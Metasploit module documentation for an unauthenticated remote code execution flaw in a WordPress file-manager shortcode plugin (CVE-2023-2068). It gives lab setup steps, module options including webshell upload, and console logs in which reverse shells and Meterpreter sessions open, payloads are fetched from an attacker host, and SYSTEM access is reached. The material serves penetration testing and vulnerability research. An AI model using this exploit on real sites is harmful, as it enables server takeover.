## Vulnerable Application

WordPress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode.

The WordPress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
This leads to RCE in cases where the allowed MIME type list does not include PHP files.
In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.

File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
To install the Shortcode plugin, File Manager Advanced version `5.0.5` or lower is required to keep the configuration vulnerable.
Any user can exploit this vulnerability which results in access to the underlying operating system with the same privileges
under which the WordPress web services run.

For more information, see [This Article](https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068).

This module has been tested on:
* Windows  Server 2019 Standard and Kali Linux running on Raspberry PI.
* WordPress 6.2.2
* File Manager Advanced 5.0.5
* File Manager Advanced Shortcode 2.3.2

**Instructions for a vulnerable WordPress installation:**
Create a new docker-compose.yml file:
```
version: '3.1'

services:

  wordpress:
    image: wordpress:6.2.2-php8.0
    restart: always
    ports:
      - 8080:80
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: exampleuser
      WORDPRESS_DB_PASSWORD: examplepass
      WORDPRESS_DB_NAME: exampledb

  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_DATABASE: exampledb
      MYSQL_USER: exampleuser
      MYSQL_PASSWORD: examplepass
      MYSQL_RANDOM_ROOT_PASSWORD: '1'
```

Now start the application:
```
docker-compose up
```

Then verify the application is running at http://127.0.0.1:8080 - and complete the installation steps.

## Installing the vulnerable application
After you have successfully installed and configured WordPress, follow the below steps to install the vulnerable plugins.
From the same directory as the `docker-compose.yml` file enter into an interactive terminal:
```
docker-compose exec -it wordpress /bin/bash
```

Inside the container install the first plugin - `file-manager-advanced`:
```
cd /var/www/html/wp-content/plugins
apt update
apt install unzip
curl -O https://downloads.wordpress.org/plugin/file-manager-advanced.5.0.zip
unzip ./file-manager-advanced.5.0.zip
unzip file-manager-advanced/file-manager-advanced.zip
rm ./file-manager-advanced.5.0.zip
rm file-manager-advanced/file-manager-advanced.zip
```

Then for the second plugin - `file-manager-advanced-shortcode`
```
cd /var/www/html/wp-content/plugins
curl -L -O https://github.com/h00die-gr3y/Metasploit/raw/main/images/file-manager-advanced-shortcode-2.3.2-mdnhux.zip
```

Verify the sha256 matches - `3d5ff82293ec2d98d1f70f27434f810c0c02d38f97d512332a43b8777dde09fe`. *Note - if this does not match we advise a security review of the plugin*:
```
sha256sum ./file-manager-advanced-shortcode-2.3.2-mdnhux.zip

3d5ff82293ec2d98d1f70f27434f810c0c02d38f97d512332a43b8777dde09fe  ./file-manager-advanced-shortcode-2.3.2-mdnhux.zip
```

Extract the plugin and remove the upgrade script:
```
unzip file-manager-advanced-shortcode-2.3.2-mdnhux.zip
apt install vim

# Delete the upgrade library file
rm file-manager-advanced-shortcode/upgrade/upgrade.php

# Delete the upgrade requests
vim file-manager-advanced-shortcode/file-manager-advanced-shortcode.php

# Ensure these lines are removed from 'file-manager-advanced-shortcode/file-manager-advanced-shortcode.php'
# require_once ( 'upgrade/upgrade.php');
# new file_manager_advanced_shortcode_updates( $fma_plugin_current_version, $fma_plugin_remote_path, $fma_plugin_slug, $fma_license_order, $fma_license_key );
```

Now activate the plugins and create the vulnerable Wordpress page.
1. Login as the previously created Wordpress account
2. On left side menu, then go to `Plugins`
3. Activate the File Manager Advanced plugin
4. Activate the File Manager Advanced Shortcode plugin
5. Navigate to `Pages` on the left side menu and select `Add New`
6. Click the `+` symbol in the top left of the webpage and search for `Shortcode`
7. Select `Shortcode` and paste the follow Shortcode:
    ```
    [file_manager_advanced login="yes" roles="author,editor,administrator" path="wp-content" hide="plugins" operations="download,upload"
     block_users="5" view="grid" theme="light" lang ="en" upload_allow="image/png" upload_max_size="2G"]
    ```
8. Set the `TARGETURI` option with the uripath pointing to this webpage e.g. `/?page_id=5`
9. Run the module and enjoy a `reverse shell` or `meterpreter`

## Verification Steps

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Windows Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings

```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > info

       Name: Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode
     Module: exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce
   Platform: Windows, Unix, Linux, PHP
       Arch: cmd, php, x64, x86, aarch64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-05-31

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Mateus Machado Tesser

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper
      3   Windows Command
      4   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting                Required  Description
  ----       ---------------                --------  -----------
  Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.201.10                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80                             yes       The target port (TCP)
  SSL        false                          no        Negotiate SSL/TLS for outgoing connections
  SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /wordpress/index.php/fma-auth  yes       File Manager Advanced (FMA) Shortcode URI path
  URIPATH                                   no        The URI to use for this exploit (default is random)
  VHOST                                     no        HTTP server virtual host
  WEBSHELL                                  no        The name of the webshell with extension php. Webshell name will be randomly generated if left unset.


  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all
                                       addresses.
  SRVPORT  1981             yes       The local port to listen on.

Payload information:

Description:
  The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
  This leads to RCE in cases where the allowed MIME type list does not include PHP files.
  In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
  File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
  To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration
  vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system
  with the same privileges under which the Wordpress web services run.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-2068
  https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068
  https://packetstormsecurity.com/files/172707
  https://wpscan.com/vulnerability/58f72953-56d2-4d86-a49b-311b5fc58056


View the full module info with the info -d command.
```
## Options

### TARGETURI
The uripath to the webpage where the file-manager-advanced shortcode is embedded.

### WEBSHELL
You can use this option to set the filename and extension (should be .php) of the webshell.
This is handy if you want to test the webshell upload and execution with different file names.
to bypass any security settings on the Web and PHP server.

### COMMAND
This option provides the user to choose the PHP underlying shell command function to be used for execution.
The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
This option is only available when the target selected is either Unix Command or Linux Dropper.
For the native PHP target, by default the `eval()` function will be used for native PHP code execution.

## Scenarios
### Windows Server 2019 PHP - php/meterpreter/reverse_tcp
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.55
[+] Deleted KBWxIdRChosZC.php
[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.55:50380) at 2023-06-28 14:13:07 +0000

meterpreter > sysinfo
Computer    : WIN-BJDNH44EEDB
OS          : Windows NT WIN-BJDNH44EEDB 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username: SYSTEM
meterpreter >
```
### Kali Linux Server Unix Command -  cmd/unix/reverse_bash
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted LlCresesS.php
[*] Command shell session 5 opened (192.168.201.10:4444 -> 192.168.201.10:56290) at 2023-06-28 15:34:20 +0000

uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Kali Linux Server Linux Dropper -  linux/aarch64/meterpreter_reverse_tcp
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.10:1981/manX3C
[*] Client 192.168.201.10 (Wget/1.21.3) requested /manX3C
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[+] Deleted nypafHKuf.php
[*] Meterpreter session 6 opened (192.168.201.10:4444 -> 192.168.201.10:38108) at 2023-06-28 15:36:11 +0000
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
### Windows Server 2019 Windows Command - cmd/windows/powershell/x64/meterpreter/reverse_tcp
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing Windows Command for cmd/windows/powershell/x64/meterpreter/reverse_tcp
[*] Sending stage (200774 bytes) to 192.168.201.55
[+] Deleted HAJSKquhaDT.php
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.55:50464) at 2023-06-28 14:21:39 +0000

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
### Windows Server 2019 Windows Dropper - windows/x64/meterpreter/reverse_tcp
```
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/yRZ6hM
[*] Client 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /yRZ6hM
[*] Sending payload to 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
[*] Sending stage (200774 bytes) to 192.168.201.55
[+] Deleted hjAQqbEFAt.php
[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.55:50519) at 2023-06-28 14:26:02 +0000
[*] Command Stager progress - 100.00% done (146/146 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

## Limitations
No limitations.
